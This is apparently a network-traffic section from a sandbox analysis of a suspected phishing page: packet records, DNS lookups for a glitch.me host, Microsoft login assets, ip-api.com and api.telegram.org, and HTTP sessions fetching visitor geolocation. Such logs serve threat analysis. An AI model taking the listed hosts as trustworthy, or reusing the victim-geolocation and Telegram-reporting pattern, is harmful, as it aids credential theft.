                                                                                                                      Dec 3, 2024 08:56:03.869237900 CET50119443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.869245052 CET4435011913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.890297890 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.890335083 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.890387058 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.890405893 CET50117443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.890443087 CET50117443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.892720938 CET50117443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.892744064 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.892755985 CET50117443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.892760992 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.895756006 CET50122443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.895801067 CET4435012213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.895895958 CET50122443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.896040916 CET50122443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.896054983 CET4435012213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.176227093 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.179348946 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.179409981 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.179424047 CET50118443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.179487944 CET50118443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.216125011 CET50118443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.216150045 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.216161966 CET50118443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.216167927 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.219333887 CET50123443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.219371080 CET4435012313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.219439983 CET50123443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.219614983 CET50123443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.219629049 CET4435012313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.286150932 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.287317991 CET50120443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.287353039 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.288248062 CET50120443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.288254023 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.314798117 CET4435011913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.314881086 CET4435011913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.314949036 CET50119443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.315109015 CET50119443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.315128088 CET4435011913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.315140009 CET50119443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.315145016 CET4435011913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.320255041 CET50124443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.320288897 CET4435012413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.320348978 CET50124443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.320514917 CET50124443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.320528984 CET4435012413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.739578962 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.742814064 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.742862940 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.742979050 CET50120443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.742979050 CET50120443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.743019104 CET50120443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.743019104 CET50120443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.743037939 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.743046999 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.746185064 CET50125443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.746215105 CET4435012513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.746318102 CET50125443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.746488094 CET50125443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.746504068 CET4435012513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.772416115 CET4435012113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.772875071 CET50121443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.772910118 CET4435012113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.773363113 CET50121443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:04.773367882 CET4435012113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.831645966 CET50126443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:56:04.831690073 CET44350126142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:04.831778049 CET50126443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:56:04.832092047 CET50126443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:56:04.832104921 CET44350126142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:05.226340055 CET4435012113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:05.229537964 CET4435012113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:05.229610920 CET50121443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:05.229666948 CET50121443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:05.229680061 CET4435012113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:05.229690075 CET50121443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:05.229693890 CET4435012113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:05.232795954 CET50127443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:05.232820034 CET4435012713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:05.232891083 CET50127443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:05.233038902 CET50127443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:05.233048916 CET4435012713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:05.705265999 CET4435012213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:05.706062078 CET50122443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:05.706099033 CET4435012213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:05.706576109 CET50122443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:05.706582069 CET4435012213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:06.064320087 CET4435012313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:06.064950943 CET50123443192.168.2.413.107.246.63
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 3, 2024 08:54:04.745887041 CET192.168.2.41.1.1.10xd97Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:04.746531010 CET192.168.2.41.1.1.10x45d8Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.027447939 CET192.168.2.41.1.1.10x3dc9Standard query (0)branched-versed-session.glitch.meA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.027595997 CET192.168.2.41.1.1.10x765cStandard query (0)branched-versed-session.glitch.me65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.730439901 CET192.168.2.41.1.1.10x4684Standard query (0)branched-versed-session.glitch.meA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.730612040 CET192.168.2.41.1.1.10x205cStandard query (0)branched-versed-session.glitch.me65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.750240088 CET192.168.2.41.1.1.10x328bStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.750565052 CET192.168.2.41.1.1.10x4aa1Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.751075983 CET192.168.2.41.1.1.10x1b84Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.751255035 CET192.168.2.41.1.1.10x2033Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.751616001 CET192.168.2.41.1.1.10x3cb0Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.751764059 CET192.168.2.41.1.1.10xfe94Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.021440983 CET192.168.2.41.1.1.10x32f8Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.021610975 CET192.168.2.41.1.1.10x35cdStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.277144909 CET192.168.2.41.1.1.10x8d1aStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.277287960 CET192.168.2.41.1.1.10xbd69Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.293961048 CET192.168.2.41.1.1.10x6995Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.294111967 CET192.168.2.41.1.1.10x3a97Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.857078075 CET192.168.2.41.1.1.10x2afdStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.857234001 CET192.168.2.41.1.1.10xd729Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.873538971 CET192.168.2.41.1.1.10x1e33Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.873694897 CET192.168.2.41.1.1.10x5869Standard query (0)ip-api.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:32.439352989 CET192.168.2.41.1.1.10x9e43Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:32.440574884 CET192.168.2.41.1.1.10x294fStandard query (0)ip-api.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:34.269881964 CET192.168.2.41.1.1.10xb4eStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:34.270104885 CET192.168.2.41.1.1.10x87fdStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:38.421367884 CET192.168.2.41.1.1.10x56a4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:38.421529055 CET192.168.2.41.1.1.10xa3ceStandard query (0)api.telegram.org65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:42.554461002 CET192.168.2.41.1.1.10x6f24Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:42.554656029 CET192.168.2.41.1.1.10x99daStandard query (0)api.telegram.org65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:05.540107012 CET192.168.2.41.1.1.10x6258Standard query (0)www.itnaledi.co.zaA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:05.540167093 CET192.168.2.41.1.1.10x1955Standard query (0)www.itnaledi.co.za65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:06.617158890 CET192.168.2.41.1.1.10x76b8Standard query (0)www.itnaledi.co.zaA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:06.617413044 CET192.168.2.41.1.1.10xe49cStandard query (0)www.itnaledi.co.za65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:12.176261902 CET192.168.2.41.1.1.10xd517Standard query (0)www.itnaledi.co.zaA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:12.176464081 CET192.168.2.41.1.1.10xd6e7Standard query (0)www.itnaledi.co.za65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:22.814393044 CET192.168.2.41.1.1.10xcad5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:22.814547062 CET192.168.2.41.1.1.10x973dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 3, 2024 08:54:04.883244038 CET1.1.1.1192.168.2.40xd97No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:04.883886099 CET1.1.1.1192.168.2.40x45d8No error (0)www.google.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.239052057 CET1.1.1.1192.168.2.40x3dc9No error (0)branched-versed-session.glitch.me23.21.241.83A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.239052057 CET1.1.1.1192.168.2.40x3dc9No error (0)branched-versed-session.glitch.me54.204.140.196A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.239052057 CET1.1.1.1192.168.2.40x3dc9No error (0)branched-versed-session.glitch.me34.197.170.180A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.239052057 CET1.1.1.1192.168.2.40x3dc9No error (0)branched-versed-session.glitch.me35.153.112.86A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.239052057 CET1.1.1.1192.168.2.40x3dc9No error (0)branched-versed-session.glitch.me44.217.165.223A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.239052057 CET1.1.1.1192.168.2.40x3dc9No error (0)branched-versed-session.glitch.me107.23.200.217A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.239052057 CET1.1.1.1192.168.2.40x3dc9No error (0)branched-versed-session.glitch.me52.44.230.20A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:23.239052057 CET1.1.1.1192.168.2.40x3dc9No error (0)branched-versed-session.glitch.me54.227.225.255A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.869626999 CET1.1.1.1192.168.2.40x4684No error (0)branched-versed-session.glitch.me23.21.241.83A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.869626999 CET1.1.1.1192.168.2.40x4684No error (0)branched-versed-session.glitch.me54.204.140.196A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.869626999 CET1.1.1.1192.168.2.40x4684No error (0)branched-versed-session.glitch.me34.197.170.180A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.869626999 CET1.1.1.1192.168.2.40x4684No error (0)branched-versed-session.glitch.me35.153.112.86A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.869626999 CET1.1.1.1192.168.2.40x4684No error (0)branched-versed-session.glitch.me44.217.165.223A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.869626999 CET1.1.1.1192.168.2.40x4684No error (0)branched-versed-session.glitch.me107.23.200.217A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.869626999 CET1.1.1.1192.168.2.40x4684No error (0)branched-versed-session.glitch.me54.227.225.255A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.869626999 CET1.1.1.1192.168.2.40x4684No error (0)branched-versed-session.glitch.me52.44.230.20A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.887689114 CET1.1.1.1192.168.2.40x328bNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.887689114 CET1.1.1.1192.168.2.40x328bNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.887689114 CET1.1.1.1192.168.2.40x328bNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.888055086 CET1.1.1.1192.168.2.40x4aa1No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.888055086 CET1.1.1.1192.168.2.40x4aa1No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.889023066 CET1.1.1.1192.168.2.40x3cb0No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.889023066 CET1.1.1.1192.168.2.40x3cb0No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.889179945 CET1.1.1.1192.168.2.40xfe94No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.890065908 CET1.1.1.1192.168.2.40x1b84No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.890065908 CET1.1.1.1192.168.2.40x1b84No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.890065908 CET1.1.1.1192.168.2.40x1b84No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:27.890065908 CET1.1.1.1192.168.2.40x1b84No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.159893990 CET1.1.1.1192.168.2.40x32f8No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.159893990 CET1.1.1.1192.168.2.40x32f8No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.159893990 CET1.1.1.1192.168.2.40x32f8No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.159893990 CET1.1.1.1192.168.2.40x32f8No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.414766073 CET1.1.1.1192.168.2.40xbd69No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.414779902 CET1.1.1.1192.168.2.40x8d1aNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.414779902 CET1.1.1.1192.168.2.40x8d1aNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.431833982 CET1.1.1.1192.168.2.40x6995No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.431833982 CET1.1.1.1192.168.2.40x6995No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.431833982 CET1.1.1.1192.168.2.40x6995No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.434701920 CET1.1.1.1192.168.2.40x3a97No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:30.434701920 CET1.1.1.1192.168.2.40x3a97No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:31.012541056 CET1.1.1.1192.168.2.40x1e33No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:31.226958990 CET1.1.1.1192.168.2.40xd729No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:31.231184006 CET1.1.1.1192.168.2.40x2afdNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:31.231184006 CET1.1.1.1192.168.2.40x2afdNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:31.231184006 CET1.1.1.1192.168.2.40x2afdNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:31.231184006 CET1.1.1.1192.168.2.40x2afdNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:31.231184006 CET1.1.1.1192.168.2.40x2afdNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:32.577919960 CET1.1.1.1192.168.2.40x9e43No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:34.408124924 CET1.1.1.1192.168.2.40xb4eNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:34.408124924 CET1.1.1.1192.168.2.40xb4eNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:34.408124924 CET1.1.1.1192.168.2.40xb4eNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:34.408124924 CET1.1.1.1192.168.2.40xb4eNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:34.408124924 CET1.1.1.1192.168.2.40xb4eNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:34.408354998 CET1.1.1.1192.168.2.40x87fdNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:38.559437990 CET1.1.1.1192.168.2.40x56a4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:54:42.693047047 CET1.1.1.1192.168.2.40x6f24No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:07.158359051 CET1.1.1.1192.168.2.40x6258No error (0)www.itnaledi.co.za196.22.142.143A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:07.855070114 CET1.1.1.1192.168.2.40x76b8No error (0)www.itnaledi.co.za196.22.142.143A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:12.317526102 CET1.1.1.1192.168.2.40xd517No error (0)www.itnaledi.co.za196.22.142.143A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:22.951888084 CET1.1.1.1192.168.2.40xcad5No error (0)www.google.com216.58.208.228A (IP address)IN (0x0001)false
                                                                                                                      Dec 3, 2024 08:55:22.953466892 CET1.1.1.1192.168.2.40x973dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.449764208.95.112.1804284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 3, 2024 08:54:31.140660048 CET326OUTGET /json/?fields=status,country,regionName,city,query HTTP/1.1
                                                                                                                      Host: ip-api.com
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Origin: null
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Dec 3, 2024 08:54:32.419543028 CET288INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:32 GMT
                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                      Content-Length: 111
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      X-Ttl: 60
                                                                                                                      X-Rl: 44
                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                                                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","city":"New York","query":"8.46.123.228"}
                                                                                                                      Dec 3, 2024 08:55:17.434386015 CET6OUTData Raw: 00
                                                                                                                      Data Ascii:


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.449768208.95.112.1804284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 3, 2024 08:54:32.699810028 CET312OUTGET /json/?fields=status,country,regionName,city,query HTTP/1.1
                                                                                                                      Host: ip-api.com
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Dec 3, 2024 08:54:33.904200077 CET288INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:33 GMT
                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                      Content-Length: 111
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      X-Ttl: 60
                                                                                                                      X-Rl: 44
                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                                                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","city":"New York","query":"8.46.123.228"}
                                                                                                                      Dec 3, 2024 08:55:18.918836117 CET6OUTData Raw: 00
                                                                                                                      Data Ascii:


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.44974123.218.208.109443
